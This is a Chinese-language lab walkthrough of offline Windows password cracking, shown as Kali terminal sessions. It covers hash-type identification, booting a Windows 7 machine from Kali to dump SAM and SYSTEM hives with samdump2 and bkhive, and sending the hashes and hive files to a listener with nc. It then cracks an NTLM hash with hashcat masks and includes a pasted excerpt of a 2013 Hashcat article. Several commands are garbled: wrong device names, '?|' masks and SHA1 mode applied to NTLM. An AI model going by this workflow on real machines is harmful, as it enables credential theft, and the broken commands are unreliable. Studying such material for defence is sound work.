离线密码破解 优势 - 离线不会触发密码锁定机制 - 不会产生大量登录失败日志引起管理员注意 HASH识别工具 - hash-identifier - Hashid - 可能识别错误或无法识别 |
通过使用hashid或者Hash-Identifier这种工具来识别哈希类型
工具下载地址:
git clone https://github.com/psypanda/hashid.git
git clone https://github.com/Miserlou/Hash-Identifier.git
root@k:~/Hash-Identifier# ls
Hash_ID.py README.md
root@k:~/Hash-Identifier# chmod u+x Hash_ID.py //赋予执行权限
root@k:~/Hash-Identifier# python Hash_ID.py //打开Hashid
-------------------------------------------------------------------------
HASH: 5f4dcc3b5aa765d61d8327deb882cf99 //md5加密
Possible Hashs:
[+] MD5
[+] Domain Cashed Credentials . MD4(MD5($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
-------------------------------------------------------------------------
HASH: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 //shal加密
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
-------------------------------------------------------------------------
root@K:~# hashid b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86
[+] SHA-512
[+] Whirlpool
[+] Salsa10
[+] Salsa20
[+] SHA3-512
[+] SKein-512
[+] Skein-1024(512)
oot@k:~/hashid# hashid 5f4dcc3b5aa765d61d8327deb882cf99
Analyzing '5f4dcc3b5aa765d61d8327deb882cf99'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
离线密码破解 Windows HASH获取工具 - 利用漏洞: Pwdump、fgdump、mimikatz、wce - 物理接触: samdump2 - Kali ISO 启动虚拟机 - mount /dev/sdal /mnt - cd /mnt/Windows/System32/config - samdump2 SYSTEM SAM -o sam.hash - 利用nc传输HASH |
win7 ip地址: 192.168.1.121
C:\net user w7 1234
命令完成成功!
root@kali:~# fdisk -l //查看分区
Disk /dev/sha: 80 GiB, 85899345920 bytes, 16772160 sectors
UNits: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes /512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklablel type: dos
Disk identifier: 0x6852cbef
Device Boot Start End Sectors Size ID Type
/dev/sdal * 2048 206847 204800 100M 7 HPFS/NTFS/exFAX
/dev/sda2 206848 16770111 167563264 79.9G 7 HPFS/NTFS/exFAX
Disk /dev/loop0: 2.4GB, 2556620800 bytes, 4993400 sectors
UNits: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes /512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
root@kali:~# mount /dev/sha2 /mnt/
root@kali:~# mount /dev/sha2 /media/
root@kali:~# cd /media/
root@kali:/media# ls
Boot bootmgr BOOTSECT.BAK grldr $RECUELE.BIN System volume Information
root@kali:/media# cd /mnt/
root@kali:/mnt# ls
Documents and Settings
pagefiles.sys
PerfLogs
root@kali:/mnt# cd /mnt/Windows/System32/config
root@kali:/mnt/Windows/System32/config# ls
root@kali:/mnt/Windows/System32/config# samdump2 SYSTEM SAM -o sam.hash
root@kali:/mnt/Windows/System32/config# cat sam.hash
*disbaled* Administrator:500:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disbaled* Guest:501:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
w7:1000:aad3b435b5140eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
root@K:~# nc -nvlp 3333
listeing on [any] 333...
connect to [192.168.1.117] from (UNKNOWN) [192.168.1.121] 56580
7ce21f17c0aee7fb9ceba532d0546ad6
↑
│利用nc监听传给它
│
root@kali:/mnt/Windows/System32/config# nc 192.168.1.117 333
7ce21f17c0aee7fb9ceba532d0546ad6
离线密码破解-----Hashcat 开源多线程密码破解工具 支持80多种加密算法破解 基于CPU的计算能力破解 六种模式 - 0 Straight: 字典破解 - 1 Combination: 将字典中密码进行组合(1 2 > 11 22 12 21) - 2 Toggle case: 尝试字典中所有密码的大小写字母组合 - 3 Brute force: 指定字符集(或全部字符集)所有组合 - 4 Permutation: 字典中密码的全部字符置换组合(12 21) - 5 Table-lookup: 程序为字典中所有密码自动生成掩码 |
GPU破解神器Hashcat使用简介
ccSec · 2013/09/30 20:13
0x00 背景
目前GPU的速度越来越快,使用GPU超强的运算速度进行暴力密码破解也大大提高了成功率,曾经看到老外用26块显卡组成的分布式破解神器让我羡慕不已。要说目前最好的GPU破解HASH的软件,非HashCat莫属了。下面我就为大家具体介绍一下HashCat系列软件。
0x01 所需硬件及系统平台
HashCat系列软件在硬件上支持使用CPU、NVIDIA GPU、ATI GPU来进行密码破解。在操作系统上支持Windows、Linux平台,并且需要安装官方指定版本的显卡驱动程序,如果驱动程序版本不对,可能导致程序无法运行。
如果要搭建多GPU破解平台的话,最好是使用Linux系统来运行HashCat系列软件,因为在windows下,系统最多只能识别4张显卡。并且,Linux下的VisualCL技术(关于如何搭建VisualCL环境,请参考官方文档http://hashcat.net/wiki/doku.php?id=vcl_cluster_howto),可以轻松的将几台机器连接起来,进行分布式破解作业。 在破解速度上,ATI GPU破解速度最快,使用单张HD7970破解MD5可达到9000M/s的速度,其次为NVIDIA显卡,同等级显卡GTX690破解速度大约为ATI显卡的三分之一,速度最慢的是使用CPU进行破解。
0x02 HashCat软件简介
HashCat主要分为三个版本:Hashcat、oclHashcat-plus、oclHashcat-lite。这三个版本的主要区别是:HashCat只支持CPU破解。oclHashcat-plus支持使用GPU破解多个HASH,并且支持的算法高达77种。oclHashcat-lite只支持使用GPU对单个HASH进行破解,支持的HASH种类仅有32种,但是对算法进行了优化,可以达到GPU破解的最高速度。如果只有单个密文进行破解的话,推荐使用oclHashCat-lite。
目前最新的软件版本为HashCat v0.46、oclHashcat-plus v0.15、oclHashcat-lite v0.15。但是经过一段时间的测试,发现有时候版本越高,速度越慢。所以推荐在使用没有问题的情况下,无需升级到最新版本。根据测试,oclHashcat-lite v0.10的运算速度比v0.15的运算速度快20%,所以单个密文破解还是推荐使用oclHashcat-lite v0.10。
root@k:~# hashcat -h
hashcat, advanced password recovery
Usage: hashcat [options] hashfile [mask|wordfiles|directories]
=======
Options
=======
* General:
-m, --hash-type=NUM Hash-type, see references below
-a, --attack-mode=NUM Attack-mode, see references below
-V, --version Print version
-h, --help Print help
--quiet Suppress output
* Benchmark:
-b, --benchmark Run benchmark
* Misc:
--hex-salt Assume salt is given in hex
--hex-charset Assume charset is given in hex
--runtime=NUM Abort session after NUM seconds of runtime
--status Enable automatic update of the status-screen
--status-timer=NUM Seconds between status-screen update
--status-automat Display the status view in a machine readable format
* Files:
-o, --outfile=FILE Define outfile for recovered hash
--outfile-format=NUM Define outfile-format for recovered hash, see references below
--outfile-autohex-disable Disable the use of $HEX[] in output plains
-p, --separator=CHAR Define separator char for hashlists/outfile
--show Show cracked passwords only (see --username)
--left Show uncracked passwords only (see --username)
--username Enable ignoring of usernames in hashfile (Recommended: also use --show)
--remove Enable remove of hash once it is cracked
--stdout Stdout mode
--potfile-disable Do not write potfile
--debug-mode=NUM Defines the debug mode (hybrid only by using rules), see references below
--debug-file=FILE Output file for debugging rules (see --debug-mode)
-e, --salt-file=FILE Salts-file for unsalted hashlists
* Resources:
-c, --segment-size=NUM Size in MB to cache from the wordfile
-n, --threads=NUM Number of threads
-s, --words-skip=NUM Skip number of words (for resume)
-l, --words-limit=NUM Limit number of words (for distributed)
* Rules:
-r, --rules-file=FILE Rules-file use: -r 1.rule
-g, --generate-rules=NUM Generate NUM random rules
--generate-rules-func-min=NUM Force NUM functions per random rule min
--generate-rules-func-max=NUM Force NUM functions per random rule max
--generate-rules-seed=NUM Force RNG seed to NUM
* Custom charsets:
-1, --custom-charset1=CS User-defined charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef : sets charset ?1 to 0123456789abcdef
-4, --custom-charset4=CS -2 mycharset.hcchr : sets charset ?2 to chars contained in file
* Toggle-Case attack-mode specific:
--toggle-min=NUM Number of alphas in dictionary minimum
--toggle-max=NUM Number of alphas in dictionary maximum
* Mask-attack attack-mode specific:
--increment Enable increment mode
--increment-min=NUM Start incrementing at NUM
--increment-max=NUM Stop incrementing at NUM
* Permutation attack-mode specific:
--perm-min=NUM Filter words shorter than NUM
--perm-max=NUM Filter words larger than NUM
* Table-Lookup attack-mode specific:
-t, --table-file=FILE Table file
--table-min=NUM Number of chars in dictionary minimum
--table-max=NUM Number of chars in dictionary maximum
* Prince attack-mode specific:
--pw-min=NUM Print candidate if length is greater than NUM
--pw-max=NUM Print candidate if length is smaller than NUM
--elem-cnt-min=NUM Minimum number of elements per chain
--elem-cnt-max=NUM Maximum number of elements per chain
--wl-dist-len Calculate output length distribution from wordlist
--wl-max=NUM Load only NUM words from input wordlist or use 0 to disable
--case-permute For each word in the wordlist that begins with a letter
generate a word with the opposite case of the first letter
==========
References
==========
* Outfile formats:
1 = hash[:salt]
2 = plain
3 = hash[:salt]:plain
4 = hex_plain
5 = hash[:salt]:hex_plain
6 = plain:hex_plain
7 = hash[:salt]:plain:hex_plain
8 = crackpos
9 = hash[:salt]:crackpos
10 = plain:crackpos
11 = hash[:salt]:plain:crackpos
12 = hex_plain:crackpos
13 = hash[:salt]:hex_plain:crackpos
14 = plain:hex_plain:crackpos
15 = hash[:salt]:plain:hex_plain:crackpos
* Debug mode output formats (for hybrid mode only, by using rules):
1 = save finding rule
2 = save original word
3 = save original word and finding rule
4 = save original word, finding rule and modified plain
* Built-in charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
* Attack modes:
0 = Straight
1 = Combination
2 = Toggle-Case
3 = Brute-force
4 = Permutation
5 = Table-Lookup
8 = Prince
* Hash types:
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
30 = md5(unicode($pass).$salt)
40 = md5($salt.unicode($pass))
50 = HMAC-MD5 (key = $pass)
60 = HMAC-MD5 (key = $salt)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
130 = sha1(unicode($pass).$salt)
140 = sha1($salt.unicode($pass))
150 = HMAC-SHA1 (key = $pass)
160 = HMAC-SHA1 (key = $salt)
200 = MySQL323
300 = MySQL4.1/MySQL5
400 = phpass, MD5(Wordpress), MD5(phpBB3), MD5(Joomla)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials (DCC), MS Cache
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1430 = sha256(unicode($pass).$salt)
1431 = base64(sha256(unicode($pass)))
1440 = sha256($salt.unicode($pass))
1450 = HMAC-SHA256 (key = $pass)
1460 = HMAC-SHA256 (key = $salt)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1730 = sha512(unicode($pass).$salt)
1740 = sha512($salt.unicode($pass))
1750 = HMAC-SHA512 (key = $pass)
1760 = HMAC-SHA512 (key = $salt)
1800 = SHA-512(Unix)
2400 = Cisco-PIX MD5
2410 = Cisco-ASA MD5
2500 = WPA/WPA2
2600 = Double MD5
3200 = bcrypt, Blowfish(OpenBSD)
3300 = MD5(Sun)
3500 = md5(md5(md5($pass)))
3610 = md5(md5($salt).$pass)
3710 = md5($salt.md5($pass))
3720 = md5($pass.md5($salt))
3800 = md5($salt.$pass.$salt)
3910 = md5(md5($pass).md5($salt))
4010 = md5($salt.md5($salt.$pass))
4110 = md5($salt.md5($pass.$salt))
4210 = md5($username.0.$pass)
4300 = md5(strtoupper(md5($pass)))
4400 = md5(sha1($pass))
4500 = Double SHA1
4600 = sha1(sha1(sha1($pass)))
4700 = sha1(md5($pass))
4800 = MD5(Chap), iSCSI CHAP authentication
4900 = sha1($salt.$pass.$salt)
5000 = SHA-3(Keccak)
5100 = Half MD5
5200 = Password Safe SHA-256
5300 = IKE-PSK MD5
5400 = IKE-PSK SHA1
5500 = NetNTLMv1-VANILLA / NetNTLMv1-ESS
5600 = NetNTLMv2
5700 = Cisco-IOS SHA256
5800 = Android PIN
6300 = AIX {smd5}
6400 = AIX {ssha256}
6500 = AIX {ssha512}
6700 = AIX {ssha1}
6900 = GOST, GOST R 34.11-94
7000 = Fortigate (FortiOS)
7100 = OS X v10.8+
7200 = GRUB 2
7300 = IPMI2 RAKP HMAC-SHA1
7400 = sha256crypt, SHA256(Unix)
7900 = Drupal7
8400 = WBB3, Woltlab Burning Board 3
8900 = scrypt
9200 = Cisco $8$
9300 = Cisco $9$
9800 = Radmin2
10000 = Django (PBKDF2-SHA256)
10200 = Cram MD5
10300 = SAP CODVN H (PWDSALTEDHASH) iSSHA-1
11000 = PrestaShop
11100 = PostgreSQL Challenge-Response Authentication (MD5)
11200 = MySQL Challenge-Response Authentication (SHA1)
11400 = SIP digest authentication (MD5)
99999 = Plaintext
* Specific hash types:
11 = Joomla < 2.5.18
12 = PostgreSQL
21 = osCommerce, xt:Commerce
23 = Skype
101 = nsldap, SHA-1(Base64), Netscape LDAP SHA
111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
112 = Oracle S: Type (Oracle 11+)
121 = SMF > v1.1
122 = OS X v10.4, v10.5, v10.6
123 = EPi
124 = Django (SHA-1)
131 = MSSQL(2000)
132 = MSSQL(2005)
133 = PeopleSoft
141 = EPiServer 6.x < v4
1421 = hMailServer
1441 = EPiServer 6.x > v4
1711 = SSHA-512(Base64), LDAP {SSHA512}
1722 = OS X v10.7
1731 = MSSQL(2012 & 2014)
2611 = vBulletin < v3.8.5
2612 = PHPS
2711 = vBulletin > v3.8.5
2811 = IPB2+, MyBB1.2+
3711 = Mediawiki B type
3721 = WebEdition CMS
7600 = Redmine Project Management Web App
root@k:~# echo 7ce21f17c0aee7fb9ceba532d0546ad6 >sam.hash
root@k:~# hachcat -m 100 sam.hash pass.lst
离线密码破解-----Hashcat 命令 - hashcat -b - hashcat -m 100 hash.dump pass.lst - hashcat -m 0 hash.txt -a 3 ?|?|?|?|?|?|?|?|?d?d - 结果: hashcat.pot - hashcat -m 100 -a 3 sam.hash -i --increment-min 6 --increment-max 8 ?|?|?|?|?|?|?|?| - ?| = abcdefghijklmnopqrstuvwxyz - ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ - ?d = 0123456789 - ?s = !"#$%&'()*+,-./:;<=>?@[\]^-`{|}~ - ?a = ?|?u?d?s - ?b = 0x00 - 0xff |
root@k:~# hashcat -b
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...
Device...........: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Instruction set..: x86_64
Number of threads: 1
Hash type: MD4
Speed/sec: 15.88M words
Hash type: MD5
Speed/sec: 12.96M words
Hash type: SHA1
Speed/sec: 9.28M words
Hash type: SHA256
Speed/sec: 4.65M words
Hash type: SHA512
Speed/sec: 1.94M words
Hash type: SHA-3(Keccak)
Speed/sec: 2.15M words
Hash type: GOST R 34.11-94
Speed/sec: 946.71k words
Hash type: SHA-1(Base64), nsldap, Netscape LDAP SHA
Speed/sec: 8.58M words
Hash type: SSHA-1(Base64), nsldaps, Netscape LDAP SSHA
Speed/sec: 8.21M words
Hash type: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
Speed/sec: 13.21k words
Hash type: sha256crypt, SHA256(Unix)
Speed/sec: 602 words
Hash type: sha512crypt, SHA512(Unix)
Speed/sec: 382 words
Hash type: bcrypt, Blowfish(OpenBSD)
Speed/sec: 818 words
Hash type: NTLM
Speed/sec: 14.27M words
Hash type: Domain Cached Credentials (DCC), MS Cache
Speed/sec: 8.25M words
Hash type: NetNTLMv1-VANILLA / NetNTLMv1+ESS
Speed/sec: 13.82M words
Hash type: NetNTLMv2
Speed/sec: 2.09M words
root@k:~# hashcat -m 0 hash.txt -a 3 ?d?d?d?d
nitializing hashcat v2.00 with 1 threads and 32mb segment-size...
Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash
7ce21f17c0aee7fb9ceba532d0546ad6:1234
All hashed have been recovered
Input.Mode: Mask (?d?d?d?d) [4]
Index.....: O/I (segment), 1000 (words), 0 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed sec.: -plains, 9.31k words
Progress..: 9324/10000 (93.24%)
Running...: 00:00:00:01
Estimated.: --:--:--:--:
Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
root@k:~# hashcat -m 100 -a 3 sam.hash -i --increment-min 1 --increment-max 5 ?d
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...
Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash
[s]tatus [p]ause [c]esume [b]ypas [q]uit =>
Input.Mode: Mask (?d) [1]
Index.....: O/I (segment), 10 (words), 0 (bytes)
Recovered.: O/I hashes, O/I salts
Speed sec.: -plains, - words
Progress..: 10/10 (100.00%)
Running...: --:--:--:--:
Estimated.: --:--:--:--:
[s]status [p]uase [r]esume [b]ypass [q]uit => '
Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
离线密码破解 Syskey工具 - 使用Bootkey利用RC4算法加密SAM数据库 - Bootkey保存于SYSTEM文件中 - Bkhive 从SYSTEM文件章提取bootkey Kali 2.0抛弃了bkhive 编译安装: http://http.us.debian.org/debian/pool/main/b/bkhive/ bkhive SYSTEM key samdump2 SAM key (版本已更新,不再支持此功能) - 建议使用Kali 1.x |
root@k:~# mount /dev/sha2 /mnt/
root@K:/mnt# cd /mnt/Windows/System32/config
root@k:/mnt/Windows/System32/config# ls
root@k:/mnt/Windows/System32/config# samdump2 SYSTEM SAM -o sam.hash
root@k:/mnt/Windows/System32/config# cat sam.hash
*disbaled* Administrator:500:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disbaled* Guest:501:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
w7:1000:aad3b435b5140eeaad3b435b51404ee:91d0a3767644eea90922f597bde98aae::
root@k:~# hash-identifier
-------------------------------------------------------------------------
HASH: 91d0a3767644eea90922f597bde98aae
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
-------------------------------------------------------------------------
HASH: ^CTraceback (most recent call last):
File "/usr/bin/hash-identifier", line 556, in
hash = raw_input(" HASH: ")
KeyboardInterrupt
root@k:~# echo 91d0a3767644eea90922f597bde98aae > sam1.hash
root@k:~# hashcat -m 1000 sam1.hash pass.lst
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...
Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash
[s]tatus [p]ause [c]esume [b]ypas [q]uit =>
Input.Mode: Mask (pass.lst)
Index.....: O/I (segment),499 (words), 639632 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed sec.: - plains, - words
Progress..: 4999/4999 (93.24%)
Running...: --:--:--:--:
Estimated.: --:--:--:--:
Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
root@k:~# hashcat -m 1000 -a 3 sam1.hash -i --increment-min 4 --increment-max 6 ?a?a?a?a?a?a
Initializing hashcat v2.00 with 1 threads and 32mb segment-size...
Added hash from file sam.hash: 1 (1 salts)
Activating quick-digest mode for single hash
[s]tatus [p]ause [c]esume [b]ypas [q]uit =>
Input.Mode: Mask (a?a?a?a?) [4]
Index.....: O/I (segment),499 (words), 639632 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed sec.: 9.43M plains, 9.43M words
Progress..: 81450625/81450625 (100.0%)
Running...: 00:00:00:09
Estimated.: --:--:--:--:
......
Started Fri Apr 22 00:31:47 2016
Stopped Fri Apr 22 00:31:47 2016
root@k:~/Downloads# tar zxvf bkhive_1.1.1.orig.tar.gz
bkhive-1.1.1/
bkhive-1.1.1/Makefile
bkhive-1.1.1/README
bkhive-1.1.1/bkhive.1
bkhive-1.1.1/hive.h
bkhive-1.1.1/bkhive.c
bkhive-1.1.1/AUTHORS
bkhive-1.1.1/ChangeLog
bkhive-1.1.1/COPYING
bkhive-1.1.1/Makefile.win32
bkhive-1.1.1/hive.c
root@k:~/Downloads# cd bkhive-1.1.1/
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl
libssl1.0.2 libssl-dev libssl-ocaml
libssl1.0.2-dbg libssl-doc libssl-ocaml-dev
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev
root@k:~/Downloads/bkhive-1.1.1# make
/usr/bin/gcc -c -o bkhive.o bkhive.c
/usr/bin/gcc -c -o hive.o hive.c
/usr/bin/gcc -o bkhive hive.o bkhive.o
###############################################################
Bkhive 1.0.0 : extract Syskey bootkey from the system hive file
Copyright (C) 2004-2005 Nicola Cuomo
Distributed under terms of GNU General Public License version 2
###############################################################
root@k:~/Downloads/bkhive-1.1.1# make install
###############################################################
Bkhive 1.0.0 : extract Syskey bootkey from the system hive file
Copyright (C) 2004-2005 Nicola Cuomo
Distributed under terms of GNU General Public License version 2
###############################################################
Cresting directories...
/usr/bin/install -d -m 755 -o root -g root /usr/local/bin
/usr/bin/install -d -m 755 -o root -g root /usr/local/share/man.man1
Copying binary...
/usr/bin/install bkhive -m 755 -o root -g root /usr/local/bin
Installing man page...
/usr/bin/install bkhive.1 -m 644 -o root -g root /usr/local/share/man/man1
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev
Reading package lists... Done
Building dependency tree
Reading state informatiion... Done
libssl-dev is already the newest version (1.0.2g-1).
You might want to run 'apt-get -f install' to correct thest:
The following packages have unmet dependencies:
samdump2 : Depends: libssl1.0.0 (>= 1.0.0) but it is not installable
Recommends: bkhive but it is not going to be insalled
E: Unment dependencies. Try 'apt-get -f install' with no packages (or specify a solution).
root@k:~/Downloads/bkhive-1.1.1# apt-get -f install
Reading package lists... Done
Building dependency tree
Reading state informatiion... Done
Correcting dependencies... Done
The following additional package will be installed:
samdump2
The following packages will be upgraded:
samdump2
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
1 not fully installed or removed.
Need to get 0 B/16.6 kb of archives.
After this operation, 2,048 B of additional disk space will be used.
Do you want to continue? [Y/n]
Reading changelogs... Done
(Reading database... 418766 files and directories currently installed.)
Preparing to unpack .../samdump2_3.0.0-3+b1_amd64.deb ...
Unpacking samdump2 (3.0.0-3+bl) over (1.1.1-1.1) ...
Processing triggers for man-db (2.7-5.1)...
Setting up samdump2 (3.0.0-3+b1) ...
root@k:~/Downloads/bkhive-1.1.1# apt-get purge samdump2 //卸载samdump2
Reading package lists... Done
Building dependency tree
Reading state informatiion... Done
The following additional package will be installed:
samdump2*
1 upgraded, 0 newly installed, 1 to remove and 0 not upgraded.
After this operation, 43.0 kb disk space will be freed.
Do you want to continue? [Y/n]
(Reading database... 418766 files and directories currently installed.)
Removin samdump2 (3.0.0-3+b1)
Processing triggers for man-db (2.7-5.1)..
root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev
Reading package list... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version (1.0.2g-1).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@k:~/Downloads/bkhive-1.1.1# bkhive
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author : [email protected]
Usage:
bkhive systemhive keyfile
root@k:~/Downloads/bkhive-1.1.1# nc -nvlp 333 > SYSTEM
root@kali:~# nc 192.168.1.117 333 < SYSTEM -q 1
root@k:~/Downloads/bkhive-1.1.1# nc -nvlp 333 > SAM
root@kali:~# nc 192.168.1.117 333 < SAM -q 1
root@k:~/Downloads/bkhive-1.1.1# bkhive SYSTEM bkry
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author : [email protected]
Root Key : CMI-CreateHie{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}
Default ControlSet: 001
Bootkey: 7ccc5d2742c91350cadc092c20cb5e8f
root@k:~/Downloads/bkhive-1.1.1# cat bk
bkhive bkhive.1 bkhive.c bkhive.o bkry
root@k:~/Downloads/bkhive-1.1.1# cat bkry
root@k:~/Downloads/bkhive-1.1.1# mv bkry key
root@k:~/Downloads/bkhive-1.1.1# apt-get install samdump2
root@k:~/Downloads/bkhive-1.1.1# samdump2 SAM key